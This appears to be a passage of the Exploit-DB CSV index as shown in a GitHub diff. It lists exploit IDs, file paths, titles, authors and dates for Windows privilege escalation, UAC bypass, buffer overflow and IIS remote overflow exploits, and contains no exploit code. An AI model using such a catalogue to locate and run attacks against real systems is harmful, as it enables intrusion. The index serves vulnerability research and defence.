45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
45653,exploits/windows/local/45653.rb,"Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows,
45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows,
45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86,
@ -10089,6 +10089,8 @@ id,file,description,date,author,type,platform,port
45785,exploits/hardware/local/45785.md,"Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel",2018-11-02,"Billy Brumley",local,hardware,
45796,exploits/windows_x86/local/45796.py,"Arm Whois 3.11 - Buffer Overflow (SEH)",2018-11-06,"Semen Alexandrovich Lyhin",local,windows_x86,
45798,exploits/linux/local/45798.txt,"libiec61850 1.3 - Stack Based Buffer Overflow",2018-11-06,"Dhiraj Mishra",local,linux,
45804,exploits/linux/local/45804.txt,"OpenSLP 2.0.0 - Multiple Vulnerabilities",2018-11-07,"Magnus Klaaborg Stubman",local,linux,
45805,exploits/windows/local/45805.cpp,"Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)",2018-11-08,"Tenable NS",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139

Can't render this file because it is too large.